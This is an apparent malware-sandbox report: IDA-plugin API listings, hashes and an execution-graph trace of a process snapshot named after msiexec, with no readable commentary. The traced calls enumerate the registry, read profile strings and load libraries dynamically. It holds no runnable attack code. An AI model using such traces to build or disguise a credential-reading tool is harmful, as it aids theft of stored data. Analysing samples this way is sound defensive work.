                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID:
                                                              • API String ID: 231171946-0
                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040B0D8
                                                              • free.MSVCRT ref: 0040B0FB
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040B12C
                                                              • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocstrlen
                                                              • String ID:
                                                              • API String ID: 3669619086-0
                                                              • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                              • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                              • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                              • malloc.MSVCRT ref: 00417407
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                              • free.MSVCRT ref: 00417425
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcslen$wcscat$wcscpy
                                                              • String ID:
                                                              • API String ID: 1961120804-0
                                                              • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                              • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                              Execution Graph

                                                              Execution Coverage:2.1%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0.5%
                                                              Total number of Nodes:761
                                                              Total number of Limit Nodes:20
                                                              execution_graph 33689 40fc40 70 API calls 33864 403640 21 API calls 33690 427fa4 42 API calls 33865 412e43 _endthreadex 33866 425115 76 API calls __fprintf_l 33867 43fe40 133 API calls 33693 425115 83 API calls __fprintf_l 33694 401445 memcpy memcpy DialogBoxParamA 33695 440c40 34 API calls 32910 444c4a 32929 444e38 32910->32929 32912 444c56 GetModuleHandleA 32913 444c68 __set_app_type __p__fmode __p__commode 32912->32913 32915 444cfa 32913->32915 32916 444d02 __setusermatherr 32915->32916 32917 444d0e 32915->32917 32916->32917 32930 444e22 _controlfp 32917->32930 32919 444d13 _initterm __getmainargs _initterm 32920 444d6a GetStartupInfoA 32919->32920 32922 444d9e GetModuleHandleA 32920->32922 32931 40cf44 32922->32931 32926 444dcf _cexit 32928 444e04 32926->32928 32927 444dc8 exit 32927->32926 32929->32912 32930->32919 32982 404a99 LoadLibraryA 32931->32982 32933 40cf60 32934 40cf64 32933->32934 32990 410d0e 32933->32990 32934->32926 32934->32927 32936 40cf6f 32994 40ccd7 ??2@YAPAXI 32936->32994 32938 40cf9b 33008 407cbc 32938->33008 32943 40cfc4 33027 409825 memset 32943->33027 32944 40cfd8 33032 4096f4 memset 32944->33032 32949 40d181 ??3@YAXPAX 32952 40d1b3 32949->32952 32953 40d19f DeleteObject 32949->32953 32950 407e30 _strcmpi 32951 40cfee 32950->32951 32954 40cff2 RegDeleteKeyA 32951->32954 32955 40d007 EnumResourceTypesA 32951->32955 33056 407948 free free 32952->33056 32953->32952 32954->32949 32957 40d047 32955->32957 32958 40d02f MessageBoxA 32955->32958 32961 40d0a0 CoInitialize 32957->32961 33037 40ce70 32957->33037 32958->32949 32959 40d1c4 33057 4080d4 free 32959->33057 33054 40cc26 strncat memset RegisterClassA CreateWindowExA 32961->33054 32962 40d1cd 33058 407948 free free 32962->33058 32967 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33055 40c256 PostMessageA 32967->33055 32968 40d061 ??3@YAXPAX 32968->32952 32972 40d084 DeleteObject 32968->32972 32969 40d09e 32969->32961 32972->32952 32974 40d0f9 GetMessageA 32975 40d17b CoUninitialize 32974->32975 32976 40d10d 32974->32976 32975->32949 32977 40d113 TranslateAccelerator 32976->32977 32979 40d145 IsDialogMessage 32976->32979 32980 40d139 IsDialogMessage 32976->32980 32977->32976 32978 40d16d GetMessageA 32977->32978 32978->32975 32978->32977 32979->32978 32981 40d157 TranslateMessage DispatchMessageA 32979->32981 32980->32978 32980->32979 32981->32978 32983 404ac4 GetProcAddress 32982->32983 32984 404aec 32982->32984 32985 404ad4 32983->32985 32986 404add FreeLibrary 32983->32986 32988 404b13 32984->32988 32989 404afc MessageBoxA 32984->32989 32985->32986 32986->32984 32987 404ae8 32986->32987 32987->32984 32988->32933 32989->32933 32991 410d17 LoadLibraryA 32990->32991 32992 410d3c 32990->32992 32991->32992 32993 410d2b GetProcAddress 32991->32993 32992->32936 32993->32992 32995 40cd08 ??2@YAPAXI 32994->32995 32997 40cd26 32995->32997 32998 40cd2d 32995->32998 33066 404025 6 API calls 32997->33066 33000 40cd66 32998->33000 33001 40cd59 DeleteObject 32998->33001 33059 407088 33000->33059 33001->33000 33003 40cd6b 33062 4019b5 33003->33062 33006 4019b5 strncat 33007 40cdbf _mbscpy 33006->33007 33007->32938 33068 407948 free free 33008->33068 33011 407cf7 33013 407a1f malloc memcpy free free 33011->33013 33014 407ddc 33011->33014 33015 407d83 33011->33015 33016 407d7a free 33011->33016 33022 407e04 33011->33022 33072 40796e 7 API calls 33011->33072 33013->33011 33014->33022 33074 407a1f 33014->33074 33015->33011 33073 406f30 malloc memcpy free 33015->33073 33016->33011 33069 407a55 33022->33069 33023 407e30 33024 407e38 33023->33024 33025 407e57 33023->33025 33024->33025 33026 407e41 _strcmpi 33024->33026 33025->32943 33025->32944 33026->33024 33026->33025 33082 4097ff 33027->33082 33029 409854 33087 409731 33029->33087 33033 4097ff 3 API calls 33032->33033 33034 409723 33033->33034 33107 40966c 33034->33107 33121 4023b2 33037->33121 33043 40ced3 33205 40cdda 7 API calls 33043->33205 33044 40cece 33047 40cf3f 33044->33047 33158 40c3d0 memset GetModuleFileNameA strrchr 33044->33158 33047->32968 33047->32969 33050 40ceed 33184 40affa 33050->33184 33054->32967 33055->32974 33056->32959 33057->32962 33058->32934 33067 406fc7 memset _mbscpy 33059->33067 33061 40709f CreateFontIndirectA 33061->33003 33063 4019e1 33062->33063 33064 4019c2 strncat 33063->33064 33065 4019e5 memset LoadIconA 33063->33065 33064->33063 33065->33006 33066->32998 33067->33061 33068->33011 33070 407a65 33069->33070 33071 407a5b free 33069->33071 33070->33023 33071->33070 33072->33011 33073->33015 33075 407a38 33074->33075 33076 407a2d free 33074->33076 33081 406f30 malloc memcpy free 33075->33081 33077 407a44 33076->33077 33080 40796e 7 API calls 33077->33080 33079 407a43 33079->33077 33080->33022 33081->33079 33098 406f96 GetModuleFileNameA 33082->33098 33084 409805 strrchr 33085 409814 33084->33085 33086 409817 _mbscat 33084->33086 33085->33086 33086->33029 33099 44b090 33087->33099 33092 40930c 3 API calls 33093 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33092->33093 33094 4097c5 LoadStringA 33093->33094 33097 4097db 33094->33097 33096 4097f3 33096->32949 33097->33094 33097->33096 33106 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33097->33106 33098->33084 33100 40973e _mbscpy _mbscpy 33099->33100 33101 40930c 33100->33101 33102 44b090 33101->33102 33103 409319 memset GetPrivateProfileStringA 33102->33103 33104 409374 33103->33104 33105 409364 WritePrivateProfileStringA 33103->33105 33104->33092 33105->33104 33106->33097 33117 406f81 GetFileAttributesA 33107->33117 33109 409675 33110 4096ee 33109->33110 33111 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33109->33111 33110->32950 33118 409278 GetPrivateProfileStringA 33111->33118 33113 4096c9 33119 409278 GetPrivateProfileStringA 33113->33119 33115 4096da 33120 409278 GetPrivateProfileStringA 33115->33120 33117->33109 33118->33113 33119->33115 33120->33110 33207 409c1c 33121->33207 33124 401e69 memset 33246 410dbb 33124->33246 33127 401ec2 33270 4070e3 strlen _mbscat _mbscpy _mbscat 33127->33270 33128 401ed4 33259 406f81 GetFileAttributesA 33128->33259 33131 401ee6 strlen strlen 33133 401f15 33131->33133 33134 401f28 33131->33134 33271 4070e3 strlen _mbscat _mbscpy _mbscat 33133->33271 33260 406f81 GetFileAttributesA 33134->33260 33137 401f35 33261 401c31 33137->33261 33140 401f75 33142 402165 33140->33142 33143 401f9c memset 33140->33143 33141 401c31 5 API calls 33141->33140 33144 402195 ExpandEnvironmentStringsA 33142->33144 33145 4021a8 _strcmpi 33142->33145 33272 410b62 RegEnumKeyExA 33143->33272 33278 406f81 GetFileAttributesA 33144->33278 33145->33043 33145->33044 33148 401fd9 atoi 33149 401fef memset memset sprintf 33148->33149 33156 401fc9 33148->33156 33273 410b1e 33149->33273 33152 406f81 GetFileAttributesA 33152->33156 33153 402076 memset memset strlen strlen 33153->33156 33154 4070e3 strlen _mbscat _mbscpy _mbscat 33154->33156 33155 4020dd strlen strlen 33155->33156 33156->33142 33156->33148 33156->33152 33156->33153 33156->33154 33156->33155 33157 402167 _mbscpy 33156->33157 33277 410b62 RegEnumKeyExA 33156->33277 33157->33142 33159 40c422 33158->33159 33160 40c425 _mbscat _mbscpy _mbscpy 33158->33160 33159->33160 33161 40c49d 33160->33161 33162 40c512 33161->33162 33163 40c502 GetWindowPlacement 33161->33163 33164 40c538 33162->33164 33296 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33162->33296 33163->33162 33289 409b31 33164->33289 33168 40ba28 33169 40ba87 33168->33169 33175 40ba3c 33168->33175 33299 406c62 LoadCursorA SetCursor 33169->33299 33171 40ba8c 33300 403c16 33171->33300 33366 4107f1 33171->33366 33369 404734 33171->33369 33377 404785 33171->33377 33172 40ba43 _mbsicmp 33172->33175 33173 40baa0 33174 407e30 _strcmpi 33173->33174 33178 40bab0 33174->33178 33175->33169 33175->33172 33380 40b5e5 10 API calls 33175->33380 33176 40bafa SetCursor 33176->33050 33178->33176 33179 40baf1 qsort 33178->33179 33179->33176 33673 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33184->33673 33186 40b00e 33187 40b016 33186->33187 33188 40b01f GetStdHandle 33186->33188 33674 406d1a CreateFileA 33187->33674 33190 40b01c 33188->33190 33191 40b035 33190->33191 33192 40b12d 33190->33192 33675 406c62 LoadCursorA SetCursor 33191->33675 33679 406d77 9 API calls 33192->33679 33195 40b136 33206 40c580 28 API calls 33195->33206 33196 40b087 33203 40b0a1 33196->33203 33677 40a699 12 API calls 33196->33677 33197 40b042 33197->33196 33197->33203 33676 40a57c strlen WriteFile 33197->33676 33200 40b0d6 33201 40b116 CloseHandle 33200->33201 33202 40b11f SetCursor 33200->33202 33201->33202 33202->33195 33203->33200 33678 406d77 9 API calls 33203->33678 33205->33044 33206->33047 33219 409a32 33207->33219 33210 409c80 memcpy memcpy 33211 409cda 33210->33211 33211->33210 33212 409d18 ??2@YAPAXI ??2@YAPAXI 33211->33212 33213 408db6 12 API calls 33211->33213 33215 409d54 ??2@YAPAXI 33212->33215 33216 409d8b 33212->33216 33213->33211 33215->33216 33229 409b9c 33216->33229 33218 4023c1 33218->33124 33220 409a44 33219->33220 33221 409a3d ??3@YAXPAX 33219->33221 33222 409a52 33220->33222 33223 409a4b ??3@YAXPAX 33220->33223 33221->33220 33224 409a63 33222->33224 33225 409a5c ??3@YAXPAX 33222->33225 33223->33222 33226 409a83 ??2@YAPAXI ??2@YAPAXI 33224->33226 33227 409a73 ??3@YAXPAX 33224->33227 33228 409a7c ??3@YAXPAX 33224->33228 33225->33224 33226->33210 33227->33228 33228->33226 33230 407a55 free 33229->33230 33231 409ba5 33230->33231 33232 407a55 free 33231->33232 33233 409bad 33232->33233 33234 407a55 free 33233->33234 33235 409bb5 33234->33235 33236 407a55 free 33235->33236 33237 409bbd 33236->33237 33238 407a1f 4 API calls 33237->33238 33239 409bd0 33238->33239 33240 407a1f 4 API calls 33239->33240 33241 409bda 33240->33241 33242 407a1f 4 API calls 33241->33242 33243 409be4 33242->33243 33244 407a1f 4 API calls 33243->33244 33245 409bee 33244->33245 33245->33218 33247 410d0e 2 API calls 33246->33247 33248 410dca 33247->33248 33249 410dfd memset 33248->33249 33279 4070ae 33248->33279 33251 410e1d 33249->33251 33252 410e7f _mbscpy 33251->33252 33282 410d3d _mbscpy 33251->33282 33254 401e9e strlen strlen 33252->33254 33254->33127 33254->33128 33256 410e5b 33283 410add RegQueryValueExA 33256->33283 33258 410e73 33258->33252 33259->33131 33260->33137 33262 401c4c 33261->33262 33266 401ca1 33262->33266 33284 410add RegQueryValueExA 33262->33284 33264 401c6a 33265 401c71 strchr 33264->33265 33264->33266 33265->33266 33267 401c85 strchr 33265->33267 33266->33140 33266->33141 33267->33266 33268 401c94 33267->33268 33285 406f06 strlen 33268->33285 33270->33128 33271->33134 33272->33156 33274 410b34 33273->33274 33275 410b4c 33274->33275 33288 410add RegQueryValueExA 33274->33288 33275->33156 33277->33156 33278->33145 33280 4070bd GetVersionExA 33279->33280 33281 4070ce 33279->33281 33280->33281 33281->33249 33281->33254 33282->33256 33283->33258 33284->33264 33286 406f17 33285->33286 33287 406f1a memcpy 33285->33287 33286->33287 33287->33266 33288->33275 33290 409b40 33289->33290 33292 409b4e 33289->33292 33297 409901 memset SendMessageA 33290->33297 33293 409b99 33292->33293 33294 409b8b 33292->33294 33293->33168 33298 409868 SendMessageA 33294->33298 33296->33164 33297->33292 33298->33293 33299->33171 33301 4107f1 FreeLibrary 33300->33301 33302 403c30 LoadLibraryA 33301->33302 33303 403c74 33302->33303 33304 403c44 GetProcAddress 33302->33304 33306 4107f1 FreeLibrary 33303->33306 33304->33303 33305 403c5e 33304->33305 33305->33303 33309 403c6b 33305->33309 33307 403c7b 33306->33307 33308 404734 3 API calls 33307->33308 33310 403c86 33308->33310 33309->33307 33381 4036e5 33310->33381 33313 4036e5 27 API calls 33314 403c9a 33313->33314 33315 4036e5 27 API calls 33314->33315 33316 403ca4 33315->33316 33317 4036e5 27 API calls 33316->33317 33318 403cae 33317->33318 33393 4085d2 33318->33393 33324 403cd2 33326 403cf7 33324->33326 33545 402bd1 37 API calls 33324->33545 33327 403d1c 33326->33327 33546 402bd1 37 API calls 33326->33546 33428 402c5d 33327->33428 33331 4070ae GetVersionExA 33332 403d31 33331->33332 33334 403d61 33332->33334 33547 402b22 42 API calls 33332->33547 33336 403d97 33334->33336 33548 402b22 42 API calls 33334->33548 33337 403dcd 33336->33337 33549 402b22 42 API calls 33336->33549 33440 410808 33337->33440 33341 404785 FreeLibrary 33342 403de8 33341->33342 33444 402fdb 33342->33444 33345 402fdb 29 API calls 33346 403e00 33345->33346 33456 4032b7 33346->33456 33355 403e3b 33357 403e73 33355->33357 33358 403e46 _mbscpy 33355->33358 33503 40fb00 33357->33503 33551 40f334 333 API calls 33358->33551 33367 410807 33366->33367 33368 4107fc FreeLibrary 33366->33368 33367->33173 33368->33367 33370 404785 FreeLibrary 33369->33370 33371 40473b LoadLibraryA 33370->33371 33372 40474c GetProcAddress 33371->33372 33373 40476e 33371->33373 33372->33373 33374 404764 33372->33374 33375 404781 33373->33375 33376 404785 FreeLibrary 33373->33376 33374->33373 33375->33173 33376->33375 33378 4047a3 33377->33378 33379 404799 FreeLibrary 33377->33379 33378->33173 33379->33378 33380->33175 33382 4037c5 33381->33382 33383 4036fb 33381->33383 33382->33313 33552 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33383->33552 33385 40370e 33385->33382 33386 403716 strchr 33385->33386 33386->33382 33387 403730 33386->33387 33553 4021b6 memset 33387->33553 33389 40373f _mbscpy _mbscpy strlen 33390 4037a4 _mbscpy 33389->33390 33391 403789 sprintf 33389->33391 33554 4023e5 16 API calls 33390->33554 33391->33390 33394 4085e2 33393->33394 33555 4082cd 11 API calls 33394->33555 33396 4085ec 33397 403cba 33396->33397 33398 40860b memset 33396->33398 33405 40821d 33397->33405 33557 410b62 RegEnumKeyExA 33398->33557 33400 408637 33400->33397 33401 40865c memset 33400->33401 33559 40848b 10 API calls 33400->33559 33560 410b62 RegEnumKeyExA 33400->33560 33558 410add RegQueryValueExA 33401->33558 33406 40823f 33405->33406 33407 403cc6 33406->33407 33408 408246 memset 33406->33408 33413 4086e0 33407->33413 33561 410b62 RegEnumKeyExA 33408->33561 33412 40826f 33412->33407 33562 4080ed 11 API calls 33412->33562 33563 410b62 RegEnumKeyExA 33412->33563 33564 4045db 33413->33564 33415 4088ef 33572 404656 33415->33572 33419 408737 wcslen 33419->33415 33420 40876a 33419->33420 33420->33415 33421 40877a wcsncmp 33420->33421 33423 404734 3 API calls 33420->33423 33424 404785 FreeLibrary 33420->33424 33425 408812 memset 33420->33425 33426 40883c memcpy wcschr 33420->33426 33427 4088c3 LocalFree 33420->33427 33575 40466b _mbscpy 33420->33575 33421->33420 33423->33420 33424->33420 33425->33420 33425->33426 33426->33420 33427->33420 33429 402c7a 33428->33429 33430 402c87 memset 33429->33430 33439 402d9a 33429->33439 33576 410b62 RegEnumKeyExA 33430->33576 33432 410b1e RegQueryValueExA 33433 402ce4 memset sprintf 33432->33433 33436 402cb2 33433->33436 33434 402d3a sprintf 33434->33436 33436->33432 33436->33434 33436->33439 33577 402bd1 37 API calls 33436->33577 33578 402bd1 37 API calls 33436->33578 33579 410b62 RegEnumKeyExA 33436->33579 33439->33331 33441 410816 33440->33441 33442 4107f1 FreeLibrary 33441->33442 33443 403ddd 33442->33443 33443->33341 33445 402ff9 33444->33445 33446 403006 memset 33445->33446 33447 403122 33445->33447 33580 410b62 RegEnumKeyExA 33446->33580 33447->33345 33449 403033 33449->33447 33450 410b1e RegQueryValueExA 33449->33450 33452 4030a2 memset 33449->33452 33453 410b62 RegEnumKeyExA 33449->33453 33582 402db3 24 API calls 33449->33582 33451 403058 memset sprintf 33450->33451 33451->33449 33581 410b62 RegEnumKeyExA 33452->33581 33453->33449 33457 4032d5 33456->33457 33458 4033a9 33456->33458 33583 4021b6 memset 33457->33583 33471 4034e4 memset memset 33458->33471 33460 4032e1 33584 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33460->33584 33462 4032ea 33463 4032f8 memset GetPrivateProfileSectionA 33462->33463 33585 4023e5 16 API calls 33462->33585 33463->33458 33468 40332f 33463->33468 33465 40339b strlen 33465->33458 33465->33468 33467 403350 strchr 33467->33468 33468->33458 33468->33465 33586 4021b6 memset 33468->33586 33587 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33468->33587 33588 4023e5 16 API calls 33468->33588 33472 410b1e RegQueryValueExA 33471->33472 33473 40353f 33472->33473 33474 40357f 33473->33474 33475 403546 _mbscpy 33473->33475 33479 403985 33474->33479 33589 406d55 strlen _mbscat 33475->33589 33477 403565 _mbscat 33590 4033f0 19 API calls 33477->33590 33591 40466b _mbscpy 33479->33591 33483 4039aa 33485 4039ff 33483->33485 33592 40f6e2 33483->33592 33608 40f460 12 API calls 33483->33608 33609 4038e8 21 API calls 33483->33609 33486 404785 FreeLibrary 33485->33486 33487 403a0b 33486->33487 33488 4037ca memset memset 33487->33488 33611 444551 memset 33488->33611 33491 4038e2 33491->33355 33550 40f334 333 API calls 33491->33550 33493 40382e 33494 406f06 2 API calls 33493->33494 33495 403843 33494->33495 33496 406f06 2 API calls 33495->33496 33497 403855 strchr 33496->33497 33498 403884 _mbscpy 33497->33498 33499 403897 strlen 33497->33499 33500 4038bf _mbscpy 33498->33500 33499->33500 33501 4038a4 sprintf 33499->33501 33620 4023e5 16 API calls 33500->33620 33501->33500 33505 40fb10 33503->33505 33504 403e7f 33513 40f96c 33504->33513 33505->33504 33506 40fb55 RegQueryValueExA 33505->33506 33506->33504 33507 40fb84 33506->33507 33508 404734 3 API calls 33507->33508 33509 40fb91 33508->33509 33509->33504 33510 40fc19 LocalFree 33509->33510 33511 40fbdd memcpy memcpy 33509->33511 33510->33504 33624 40f802 7 API calls 33511->33624 33514 4070ae GetVersionExA 33513->33514 33515 40f98d 33514->33515 33516 4045db 7 API calls 33515->33516 33517 40f9a9 33516->33517 33520 40fae6 33517->33520 33521 40fa13 memset WideCharToMultiByte 33517->33521 33518 404656 FreeLibrary 33519 403e85 33518->33519 33525 4442ea memset 33519->33525 33520->33518 33521->33517 33522 40fa43 _strnicmp 33521->33522 33522->33517 33523 40fa5b WideCharToMultiByte 33522->33523 33523->33517 33524 40fa88 WideCharToMultiByte 33523->33524 33524->33517 33526 410dbb 7 API calls 33525->33526 33527 444329 33526->33527 33625 40759e strlen strlen 33527->33625 33532 410dbb 7 API calls 33533 444350 33532->33533 33534 40759e 3 API calls 33533->33534 33535 44435a 33534->33535 33536 444212 64 API calls 33535->33536 33537 444366 memset memset 33536->33537 33538 410b1e RegQueryValueExA 33537->33538 33539 4443b9 ExpandEnvironmentStringsA strlen 33538->33539 33540 4443f4 _strcmpi 33539->33540 33541 4443e5 33539->33541 33542 403e91 33540->33542 33543 44440c 33540->33543 33541->33540 33542->33173 33544 444212 64 API calls 33543->33544 33544->33542 33545->33326 33546->33327 33547->33334 33548->33336 33549->33337 33550->33355 33551->33357 33552->33385 33553->33389 33554->33382 33556 40841c 33555->33556 33556->33396 33557->33400 33558->33400 33559->33400 33560->33400 33561->33412 33562->33412 33563->33412 33565 404656 FreeLibrary 33564->33565 33566 4045e3 LoadLibraryA 33565->33566 33567 404651 33566->33567 33568 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33566->33568 33567->33415 33567->33419 33569 40463d 33568->33569 33570 404643 33569->33570 33571 404656 FreeLibrary 33569->33571 33570->33567 33571->33567 33573 404666 33572->33573 33574 40465c FreeLibrary 33572->33574 33573->33324 33574->33573 33575->33420 33576->33436 33577->33434 33578->33436 33579->33436 33580->33449 33581->33449 33582->33449 33583->33460 33584->33462 33585->33463 33586->33467 33587->33468 33588->33468 33589->33477 33590->33474 33591->33483 33610 40466b _mbscpy 33592->33610 33594 40f6fa 33595 4045db 7 API calls 33594->33595 33596 40f708 33595->33596 33597 404734 3 API calls 33596->33597 33602 40f7e2 33596->33602 33603 40f715 33597->33603 33598 404656 FreeLibrary 33599 40f7f1 33598->33599 33600 404785 FreeLibrary 33599->33600 33601 40f7fc 33600->33601 33601->33483 33602->33598 33603->33602 33604 40f797 WideCharToMultiByte 33603->33604 33605 40f7b8 strlen 33604->33605 33606 40f7d9 LocalFree 33604->33606 33605->33606 33607 40f7c8 _mbscpy 33605->33607 33606->33602 33607->33606 33608->33483 33609->33483 33610->33594 33612 44458b 33611->33612 33615 40381a 33612->33615 33621 410add RegQueryValueExA 33612->33621 33614 4445a4 33614->33615 33622 410add RegQueryValueExA 33614->33622 33615->33491 33619 4021b6 memset 33615->33619 33617 4445c1 33617->33615 33623 444879 30 API calls 33617->33623 33619->33493 33620->33491 33621->33614 33622->33617 33623->33615 33624->33510 33626 4075c9 33625->33626 33627 4075bb _mbscat 33625->33627 33628 444212 33626->33628 33627->33626 33645 407e9d 33628->33645 33631 44424d 33632 444274 33631->33632 33633 444258 33631->33633 33653 407ef8 33631->33653 33634 407e9d 9 API calls 33632->33634 33670 444196 51 API calls 33633->33670 33642 4442a0 33634->33642 33636 407ef8 9 API calls 33636->33642 33637 4442ce 33667 407f90 33637->33667 33641 407f90 FindClose 33643 4442e4 33641->33643 33642->33636 33642->33637 33644 444212 64 API calls 33642->33644 33663 407e62 33642->33663 33643->33532 33644->33642 33646 407f90 FindClose 33645->33646 33647 407eaa 33646->33647 33648 406f06 2 API calls 33647->33648 33649 407ebd strlen strlen 33648->33649 33650 407ee1 33649->33650 33651 407eea 33649->33651 33671 4070e3 strlen _mbscat _mbscpy _mbscat 33650->33671 33651->33631 33654 407f03 FindFirstFileA 33653->33654 33655 407f24 FindNextFileA 33653->33655 33656 407f3f 33654->33656 33657 407f46 strlen strlen 33655->33657 33658 407f3a 33655->33658 33656->33657 33660 407f7f 33656->33660 33657->33660 33661 407f76 33657->33661 33659 407f90 FindClose 33658->33659 33659->33656 33660->33631 33672 4070e3 strlen _mbscat _mbscpy _mbscat 33661->33672 33664 407e6c strcmp 33663->33664 33666 407e94 33663->33666 33665 407e83 strcmp 33664->33665 33664->33666 33665->33666 33666->33642 33668 407fa3 33667->33668 33669 407f99 FindClose 33667->33669 33668->33641 33669->33668 33670->33631 33671->33651 33672->33660 33673->33186 33674->33190 33675->33197 33676->33196 33677->33203 33678->33200 33679->33195 33697 411853 RtlInitializeCriticalSection memset 33698 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33873 40a256 13 API calls 33875 432e5b 17 API calls 33877 43fa5a 20 API calls 33700 401060 41 API calls 33880 427260 CloseHandle memset memset 33704 410c68 FindResourceA SizeofResource LoadResource LockResource 33882 405e69 14 API calls 33706 433068 15 API calls __fprintf_l 33884 414a6d 18 API calls 33885 43fe6f 134 API calls 33708 424c6d 15 API calls __fprintf_l 33886 426741 19 API calls 33710 440c70 17 API calls 33711 443c71 42 API calls 33714 427c79 24 API calls 33889 416e7e memset __fprintf_l 33717 43f400 15 API calls 33718 42800b 47 API calls 33719 425115 82 API calls __fprintf_l 33892 41960c 61 API calls 33720 43f40c 122 API calls __fprintf_l 33723 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33724 43f81a 20 API calls 33726 414c20 memset memset 33727 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 33896 414625 18 API calls 33897 404225 modf 33898 403a26 strlen WriteFile 33900 40422a 12 API calls 33904 427632 memset memset memcpy 33905 40ca30 59 API calls 33906 404235 26 API calls 33729 425115 76 API calls __fprintf_l 33907 425115 77 API calls __fprintf_l 33909 44223a 38 API calls 33735 43183c 112 API calls 33910 44b2c5 _onexit __dllonexit 33915 42a6d2 memcpy __allrem 33737 405cda 